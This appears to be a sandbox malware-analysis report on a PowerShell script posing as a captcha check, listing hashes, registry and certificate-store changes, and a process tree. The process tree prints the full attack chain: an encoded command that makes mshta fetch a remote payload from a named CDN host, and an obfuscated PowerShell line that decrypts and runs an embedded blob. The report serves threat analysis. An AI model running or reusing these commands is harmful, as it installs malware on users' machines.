Analysis
-
max time kernel
837s -
max time network
838s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
08-08-2024 23:15
Static task
static1
Behavioral task
behavioral1
Sample
verify-captcha-987.b-cdn.net.ps1
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
verify-captcha-987.b-cdn.net.ps1
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
verify-captcha-987.b-cdn.net.ps1
Resource
win11-20240802-en
General
-
Target
verify-captcha-987.b-cdn.net.ps1
-
Size
147B
-
MD5
461d549b45e71d09f616ea14cf0f46d2
-
SHA1
eb06f635e30520fd8e764a3c6fc1216c798400c7
-
SHA256
b1fd8a4efda12d4ce3f7fa8adaf705dbab2b3b73434334c1fcb2306ff1d390b1
-
SHA512
ea3dc372f83d76964b01a0437febaef0b725267af8a2e72d55995e301ed5fea02d1792900e4ef7dee5068f2e41d96f7cdb12ed6932fff8637562e64fddb93b4f
Malware Config
Extracted
https://microsoftcamp-c3.b-cdn.net/camp-v1
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 5 2784 mshta.exe 7 2784 mshta.exe 9 2784 mshta.exe 11 2784 mshta.exe 13 2784 mshta.exe 14 2784 mshta.exe 16 1584 powershell.exe -
Downloads MZ/PE file
-
pid Process 1584 powershell.exe 1452 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4FDB78EAED1778B261972F556ED9896686411B9 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4FDB78EAED1778B261972F556ED9896686411B9\Blob = 0f00000001000000200000000a56f7fb42a0c2e3086e5d34142fd67f06a4bb16549eeec3fffacf64e0f4c259030000000100000014000000d4fdb78eaed1778b261972f556ed9896686411b92000000001000000f9020000308202f5308201dda00302010202102a7258aa607f6758eda7d28b56469d39300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303731383135303030305a170d3239303731373135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b01bcea2b0e9ec44abca778c16415f3608e813f23ce31070dab94b33447c521b4c8966cfd451c6f2f8ad0e785560b706a12526e4c044823a0cca34b75d4b7d851b623e949912adb31664175539bc4efd22d57d0c41f89cf6fb77e1957250f24189fe1498c70b1f031cb2eaac9b4b78dc384dc14b976547f5eb7d63d0f04b28c53f0c45bb8ebb4233c739593d17c675252698097d40a3ac8a745e20b0bcff82989ddf63759ebb766d712e618b756b74a23f04781feb114e5d36991ceaa9563eca332c1a080d5ceb68287b38c2b4e229b48d1bcb12c568e5ff12c0a3b504b8ea61a0ed2a8973b9512b4140d1b545a841d49402e69515f0d24225fb4d7fee794c1b0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041497e306ad6e64b96e4033f0a932b09e66521b1002300d06092a864886f70d01010b05000382010100790baed5a6f553997454b38d7e324525cbc117bd0ed7b71e414f28dc6a8eb4a9e8c5cd4556382a781fda712f214fcb44609336231f2ee707ef510f5446fad0ec8501ef0485822c289bab4e72fb6c08a0587dc2b8f12c46128fc92d829b7774c5db65d3fc1b548d5378f9d5bc5d07c111f2d24c6d4adce76d080625cc64158e4abbe1e475b3ae13b2031d1139f176e77a077ac55bcedc524608d1b7142e9eae10274a91637103b7225ac8ceb06d103fea2f2131413b5191ec93d966f08c1689df614fcaf3c0205b7412192d0b56fac5e5cf05359aaed06154db5ae86e99e2201ac74213e39d2268279faff19d5eaf64c16b28186908873868d35debe9cf0afa28 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4FDB78EAED1778B261972F556ED9896686411B9\Blob = 14000000010000001400000097e306ad6e64b96e4033f0a932b09e66521b1002030000000100000014000000d4fdb78eaed1778b261972f556ed9896686411b90f00000001000000200000000a56f7fb42a0c2e3086e5d34142fd67f06a4bb16549eeec3fffacf64e0f4c2592000000001000000f9020000308202f5308201dda00302010202102a7258aa607f6758eda7d28b56469d39300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303731383135303030305a170d3239303731373135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b01bcea2b0e9ec44abca778c16415f3608e813f23ce31070dab94b33447c521b4c8966cfd451c6f2f8ad0e785560b706a12526e4c044823a0cca34b75d4b7d851b623e949912adb31664175539bc4efd22d57d0c41f89cf6fb77e1957250f24189fe1498c70b1f031cb2eaac9b4b78dc384dc14b976547f5eb7d63d0f04b28c53f0c45bb8ebb4233c739593d17c675252698097d40a3ac8a745e20b0bcff82989ddf63759ebb766d712e618b756b74a23f04781feb114e5d36991ceaa9563eca332c1a080d5ceb68287b38c2b4e229b48d1bcb12c568e5ff12c0a3b504b8ea61a0ed2a8973b9512b4140d1b545a841d49402e69515f0d24225fb4d7fee794c1b0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041497e306ad6e64b96e4033f0a932b09e66521b1002300d06092a864886f70d01010b05000382010100790baed5a6f553997454b38d7e324525cbc117bd0ed7b71e414f28dc6a8eb4a9e8c5cd4556382a781fda712f214fcb44609336231f2ee707ef510f5446fad0ec8501ef0485822c289bab4e72fb6c08a0587dc2b8f12c46128fc92d829b7774c5db65d3fc1b548d5378f9d5bc5d07c111f2d24c6d4adce76d080625cc64158e4abbe1e475b3ae13b2031d1139f176e77a077ac55bcedc524608d1b7142e9eae10274a91637103b7225ac8ceb06d103fea2f2131413b5191ec93d966f08c1689df614fcaf3c0205b7412192d0b56fac5e5cf05359aaed06154db5ae86e99e2201ac74213e39d2268279faff19d5eaf64c16b28186908873868d35debe9cf0afa28 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4FDB78EAED1778B261972F556ED9896686411B9\Blob = 190000000100000010000000af2ee49721fc113604e45e8e1c6274ea0f00000001000000200000000a56f7fb42a0c2e3086e5d34142fd67f06a4bb16549eeec3fffacf64e0f4c259030000000100000014000000d4fdb78eaed1778b261972f556ed9896686411b914000000010000001400000097e306ad6e64b96e4033f0a932b09e66521b10022000000001000000f9020000308202f5308201dda00302010202102a7258aa607f6758eda7d28b56469d39300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303731383135303030305a170d3239303731373135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b01bcea2b0e9ec44abca778c16415f3608e813f23ce31070dab94b33447c521b4c8966cfd451c6f2f8ad0e785560b706a12526e4c044823a0cca34b75d4b7d851b623e949912adb31664175539bc4efd22d57d0c41f89cf6fb77e1957250f24189fe1498c70b1f031cb2eaac9b4b78dc384dc14b976547f5eb7d63d0f04b28c53f0c45bb8ebb4233c739593d17c675252698097d40a3ac8a745e20b0bcff82989ddf63759ebb766d712e618b756b74a23f04781feb114e5d36991ceaa9563eca332c1a080d5ceb68287b38c2b4e229b48d1bcb12c568e5ff12c0a3b504b8ea61a0ed2a8973b9512b4140d1b545a841d49402e69515f0d24225fb4d7fee794c1b0203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041497e306ad6e64b96e4033f0a932b09e66521b1002300d06092a864886f70d01010b05000382010100790baed5a6f553997454b38d7e324525cbc117bd0ed7b71e414f28dc6a8eb4a9e8c5cd4556382a781fda712f214fcb44609336231f2ee707ef510f5446fad0ec8501ef0485822c289bab4e72fb6c08a0587dc2b8f12c46128fc92d829b7774c5db65d3fc1b548d5378f9d5bc5d07c111f2d24c6d4adce76d080625cc64158e4abbe1e475b3ae13b2031d1139f176e77a077ac55bcedc524608d1b7142e9eae10274a91637103b7225ac8ceb06d103fea2f2131413b5191ec93d966f08c1689df614fcaf3c0205b7412192d0b56fac5e5cf05359aaed06154db5ae86e99e2201ac74213e39d2268279faff19d5eaf64c16b28186908873868d35debe9cf0afa28 mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1452 powershell.exe 1860 powershell.exe 1584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1584 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1452 wrote to memory of 1860 1452 powershell.exe 32 PID 1452 wrote to memory of 1860 1452 powershell.exe 32 PID 1452 wrote to memory of 1860 1452 powershell.exe 32 PID 1860 wrote to memory of 2784 1860 powershell.exe 33 PID 1860 wrote to memory of 2784 1860 powershell.exe 33 PID 1860 wrote to memory of 2784 1860 powershell.exe 33 PID 2784 wrote to memory of 1584 2784 mshta.exe 35 PID 2784 wrote to memory of 1584 2784 mshta.exe 35 PID 2784 wrote to memory of 1584 2784 mshta.exe 35
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\verify-captcha-987.b-cdn.net.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQBjADMALgBiAC0AYwBkAG4ALgBuAGUAdAAvAGMAYQBtAHAALQB2ADEA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://microsoftcamp-c3.b-cdn.net/camp-v13⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function brIUT($HjeA){return -split ($HjeA -replace '..', '0x$& ')};$TODVhRF = brIUT('BD7A2B3707B4D5A6FA04450C5974911467897FAEA635C375E61EF7F5A701362EA05A72FBED7009D99927795122F56BDB77A5C7A562CB97DD7AA6A98126D0C3DD95349835F30F3C05230430C0DA1B06762BEA3D71E28798C9BA2F77E5185B5E033FCC7326AB5E75C350E8498719A25C2CD446C6788AB4A4D29AFC35309C1D12432468945A0065100F65C114310342BF95E644A862E8C59F289D8E869948EC904A8A06AB7BCD877EF40AD48BDA41E53D670E257430C9B41D7D5BA46024B00A0E92061D4E363EC73196FAAF167EC447B53C7EC644814BEF2957F8B8DA25FED21CAAA6BCE526E15F110C22E7D24CB63CF7194D64CBF124EA15CF976417DF9A3C31F6E7F6D1D8CCC6195C1C5759C078BCEC21F1EEAD77FF7C790752A3E6F61259FD936928CC85AB8CE3C4D7F5C5C3911F2E174CA9D668BA6667CFD8552C35A49A82D37FF1802F887BE3102AFEA366E6427CAF4C00AD1D26A2A0E13891C6965C59E68BE6AD1B771007EAE5360AF9978D08345674D9362629818EE2868D79F1D161F6E045DF8E1CE495BBD8C92A3BFFFC94F280BDD27630FC034C765787C3A7394C3B4CCB8AA08B7227276E679751D805C2CFADA79F65BED7EC896FF2096B12C3192449E626BBB14B7B6792F20F020D565334CE2F9A6BB082B7156641CD6202A14786B74D551C2ADAB799E749ECD1C1E737F3C9294E5557C3665B9D47BD63DA7D157BB135E986F659A1C427850F519DCAEF577D3BCE746FA620514A5C286F439BC258BB78B2F8BD90DE2162477D01D9DC24B52215A310AB78548E959A32F0663F77CEA87BB37D0A37A31FA71DDC830BBCEF9F3316C2FFC77F6E777209B1544DD076BE18B3045673702B7B7BD251F50E7EF7B179F1D350B041D7EF374F7329D88AFCDDC3F8CD501E379C678374F52B0FDABD750FA1D09C8905FDBD67017705D890E022478F9BB030476FD95D339DE7A0F15A7DDB42F68124942D5D4486FB8BC9DDE1DE666655505E64CCA93B0C941BEC3F3BCF18754AFB267438DC5CAD4C860ECF9F25234C4B8EED6CDF6549ADCED479DC662D864BB1FE809411022D8EB6B815B883FCB91B12EAAB6FC0B6BD6560C108F4FAD4C9928D9E3B19933A86696D1467487342C9AD3D82A540A0A9DA57B998DDC6DC68EC48628034FB3EB8D2A751BD4E71564D6C5196C311F0CF29EE815190C8C98B4426C7A071721942B5077A4C5BD229C3CB7D0A1F2CE1058BF3458093B4BB3AFCEA0B4DE58511DF411FD69707FB201577A2AEC2ABC554826FD1607A5CDC60713EB9B8101FE77F08291D1A9E3966C88A29A48232CEAB5C9B6AB0EABDFC5640CBB7A15105760EA820B11DDCFB6339C87F98E0D67C8B5F66CEBCDFCDB423D2892AA2201FFFEB45A1138874A513CC6A403E80FA91647FB97DF47B73641F4180417ACB434F8905429663F3AD3CC02BB7EC8F5760A3554C5F07796EEF98D66420E4C4111AF81E26E485973D470629ED4550211C5010EA8F21888817807FBA7077101CFF1200544B8473DB4AD925D5EB83929A96D1FC5937667AB4653F867B3A228F0C730BD97983DB3BAE2349660824615BE382DDB9A6786F42826AA43A43A83EB0E42FAD3B8A6FFE05483348445AD2820E3F9EE9A7DBA888F71410BE3C06EA5EE43D1284AC88D780D1FF5AE61A5ED878A5E73545AD24752B75B054F042668AD1735BD85BE52B0AC4494CD91A14C9AC1C0ACA5DE18CBF88AAECF42D84B0A885B795DE843E77CEF65247AA617140BFC23357F1523F6A79C265A9267D13DB313CB62F90BDAAFB55F8000AED649AAE6925D1F52C5A508578E52F3D210B5EBB7489A8FCD3E6F7E60F31A97F26668424A91E50656E81F8E6DAB37AFD49EFDA7C23171D7D6DF8401B625DD00CF235FB2115DAADA9603D786DF0DDFEB60750B48C2A7E48843819382D3FACCF2C6454FEB4CBC277F2283E469A440005ADCEB43B2FC3EF86468B5DD84F05AF72A8C0581087BE2C289AAB872304A237C3754A7CECBA7EF83A712B19DB18FD57291D0692B28AFFE94FEBE59AF465F107704C6BC3331E3D612B88BCAE82A8256A6A2127FC0477CE03278BFAEAA890B624ACFA7AACAD8131B03EBEC553025E635B44DC38CA1547F6B2F66680DD5464BC1270DE1221BA59EDD09696C57FB590');$yBWZm = [System.Security.Cryptography.Aes]::Create();$yBWZm.Key = brIUT('5A504E5669636D4C584770456265426C');$yBWZm.IV = New-Object byte[] 16;$AiLfvEfU = $yBWZm.CreateDecryptor();$VKZGbTYef = $AiLfvEfU.TransformFinalBlock($TODVhRF, 0, $TODVhRF.Length);$uuGcwomEu = [System.Text.Encoding]::Utf8.GetString($VKZGbTYef);$AiLfvEfU.Dispose();& $uuGcwomEu.Substring(0,3) $uuGcwomEu.Substring(3)4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YUF3ZB4A\camp-v1[1]
Filesize207KB
MD5f0a82fcce76a638f3800a72f96ebdb00
SHA16cb602d3f4323766316d2e0811858b3392f015c4
SHA2564de7b791a8a70bb57b6396c57553963320bf0e4e48be55a450e4bc0a59a79e0e
SHA51232fd024cd7a1a0298ca2899dcc1c911981ea7487661a85eda6bcd96cfab3cbdffd61d189191eb82f2f8d53bf90aaa4359571dbe839a26addb2c9956639638878
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5447daff0baa77b9405517ce6621ad94e
SHA135efcd1efcef70b440631a0acc2d718ff1f7cc2c
SHA2560566d7dea0fe66c6004c659ef8f5f8aca351c2974a9eb9b2d8a1851807142fe1
SHA512f8a221abf50b510e11dca22660e0b721cb3f549b6ef837afde4464261c285940884faa4fcf44dadc009c64aa7ab85a166e7a17cfd385e1a64cb0586d51462cd4